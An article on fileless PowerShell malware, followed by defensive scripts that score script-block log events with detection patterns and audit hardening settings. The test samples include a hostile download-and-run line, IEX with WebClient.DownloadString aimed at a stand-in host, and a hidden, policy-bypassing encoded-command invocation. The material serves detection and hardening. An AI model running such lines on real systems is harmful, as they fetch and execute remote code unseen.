File-less Malware Is Wreaking Havoc Via PowerShell
PowerShell is not limited to the Windows desktop: Microsoft Exchange, IIS and SQL Server are administered through it as well, so they are exposed in the same way.
Fileless malware abuses PowerShell to load its malicious code straight into the console session and into RAM, without ever writing a file to disk.
Once that code runs, the attack becomes "lateral": it spreads outward from the compromised central server to other hosts.
Because the malware leaves no traces on disk once its work is done, traditional file-based security products are rarely able to identify what was behind the attack.
Only heuristic monitoring, running continuously, stands a chance of tracing the attack back to its source.
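The "heuristic monitoring" the article calls for can be applied to PowerShell's own script block log, which records the de-obfuscated text of every script block the engine compiles (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) even when that code only ever existed in memory. The following script is an added example, not code from the original article: the weighted patterns, the threshold, and the position of the script text in the event's property list are assumptions a defender would tune for their environment, and the sample script blocks at the end are constructed so the scorer can be checked offline.

```powershell
# Added example (not from the original article): heuristic scoring of PowerShell
# script-block log entries for traits common to fileless tooling.
# Pattern list and weights are assumptions; tune them to your environment.

$Patterns = @(
    @{ Name = 'EncodedCommand'; Regex = '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}'; Weight = 3 }
    @{ Name = 'InMemoryExec';   Regex = '\b(iex|invoke-expression)\b';                       Weight = 2 }
    @{ Name = 'RemoteDownload'; Regex = 'downloadstring|downloadfile|invoke-webrequest|net\.webclient'; Weight = 2 }
    @{ Name = 'HiddenWindow';   Regex = '-w(indowstyle)?\s+hidden';                           Weight = 1 }
    @{ Name = 'PolicyBypass';   Regex = '-e(p|xecutionpolicy)\s+bypass';                      Weight = 1 }
    @{ Name = 'ReflectiveLoad'; Regex = '\[reflection\.assembly\]::load|\[system\.runtime\.interopservices\.marshal\]'; Weight = 3 }
)

# Score one script block: sum the weights of every pattern it matches.
# -match is case-insensitive by default, which is what we want here.
function Get-ScriptBlockScore {
    param([Parameter(Mandatory)][string]$ScriptText)
    $score = 0
    $names = @()
    foreach ($p in $Patterns) {
        if ($ScriptText -match $p.Regex) {
            $score += $p.Weight
            $names += $p.Name
        }
    }
    [pscustomobject]@{ Score = $score; Matches = $names }
}

# Pull recent 4104 events and report those at or above the threshold.
# In 4104 events the script text is the third property (ScriptBlockText);
# that index is an assumption you should confirm against one event on your host.
function Find-SuspiciousScriptBlock {
    param([int]$Threshold = 4, [int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            $r = Get-ScriptBlockScore -ScriptText $text
            if ($r.Score -ge $Threshold) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Score   = $r.Score
                    Matches = ($r.Matches -join ',')
                    Preview = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
}

# Constructed sample script blocks (not real log data) to exercise the scorer offline:
# expected scores are 0, 5 and 4 respectively.
$samples = @(
    'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB',
    ('powershell -w hidden -ep bypass -enc ' + ('A' * 60)),
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x.ps1")'
)
$samples | ForEach-Object {
    Get-ScriptBlockScore -ScriptText $_ |
        Select-Object Score, @{ Name = 'Matches'; Expression = { $_.Matches -join ',' } }
}

# On a host with script block logging enabled, run the live scan:
# Find-SuspiciousScriptBlock -Threshold 4 | Format-Table -AutoSize
```

The scan only finds something if script block logging is turned on (see the measures below); with it off, the 4104 log is empty and the memory-only code the article describes leaves nothing to score. A reasonable deployment forwards these events to a central collector and runs the scoring there, so an attacker who gains local administrator rights cannot simply clear the host's log.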
Precautionary Measures Against Fileless Malware
- Disable PowerShell where it is not required to administer systems.
- If it can't be disabled, make sure you're running the latest version (PowerShell 5 brings better security controls on Windows).
- Restrict PowerShell to the specific features you need by running it in "Constrained Language" mode.
- Enable automatic transcription of commands; the transcripts give defenders a record from which fileless attacks can be detected.
- Employ advanced cyber-security measures such as continuously running anti-malware services.
- Continuously investigate unknown processes running on the system, since they may be the source of fileless malware.
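The checklist above maps onto a handful of concrete Windows settings. The script below is an added example, not the article's own material, that audits those settings and, with the assumed `-Enforce` switch, applies the ones that can safely be set from a script (the transcript directory is also an assumed value). It is meant to be saved as a `.ps1` file and run from an elevated Windows PowerShell 5.x session. Constrained Language mode is reported but not set, because in practice it is enforced through an application-control policy (WDAC or AppLocker) rather than a registry value.

```powershell
# Added example (not from the original article): audit, and optionally enforce,
# the PowerShell hardening items from the checklist. Run elevated, as a .ps1 file.
[CmdletBinding()]
param(
    [switch]$Enforce,
    [string]$TranscriptDir = 'C:\PSTranscripts'   # assumed path; point it at a protected central share in practice
)

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Read a value from a PowerShell policy subkey, or $null if the key/value is absent
function Get-PolicyValue {
    param([string]$SubKey, [string]$Name)
    $key = Join-Path $PolicyRoot $SubKey
    if (Test-Path $key) { (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name }
}

# Create the policy subkey if needed and write the value
function Set-PolicyValue {
    param([string]$SubKey, [string]$Name, $Value, [string]$Type = 'DWord')
    $key = Join-Path $PolicyRoot $SubKey
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name $Name -Value $Value -Type $Type
}

$findings = @()

# 1. Version: the logging and language-mode controls below need PowerShell 5 or later
$ver = $PSVersionTable.PSVersion
$findings += [pscustomobject]@{ Check = 'PowerShell version'; Value = "$ver"; Pass = ($ver.Major -ge 5) }

# 2. The legacy v2 engine runs without v5 logging, so "latest version" also means removing it
$v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
$findings += [pscustomobject]@{ Check = 'PowerShell v2 engine removed'; Value = "$($v2.State)"; Pass = ($null -eq $v2 -or $v2.State -ne 'Enabled') }
if ($Enforce -and $v2 -and $v2.State -eq 'Enabled') {
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
}

# 3. Transcription: every command in every session is written to a transcript file
$tr = Get-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting'
$findings += [pscustomobject]@{ Check = 'Transcription enabled'; Value = "$tr"; Pass = ($tr -eq 1) }
if ($Enforce -and $tr -ne 1) {
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value $TranscriptDir -Type 'String'
}

# 4. Script block logging: records the de-obfuscated script text (Event ID 4104),
#    which is what captures code that only ever lived in memory
$sbl = Get-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging'
$findings += [pscustomobject]@{ Check = 'Script block logging enabled'; Value = "$sbl"; Pass = ($sbl -eq 1) }
if ($Enforce -and $sbl -ne 1) {
    Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1
}

# 5. Language mode of the current session: reported only, since ConstrainedLanguage
#    is normally enforced through WDAC/AppLocker rather than a registry value
$mode = $ExecutionContext.SessionState.LanguageMode
$findings += [pscustomobject]@{ Check = 'Constrained Language mode'; Value = "$mode"; Pass = ($mode -eq 'ConstrainedLanguage') }

$findings | Format-Table -AutoSize
```

Run it once without `-Enforce` to see the current state, and again with `-Enforce` to apply transcription and script block logging; the version, v2-engine and language-mode rows tell you what still needs a policy or feature change outside this script. Transcripts written to a local folder can be deleted by whoever compromised the host, which is why the comment on `$TranscriptDir` recommends a central share that the writing host cannot read back.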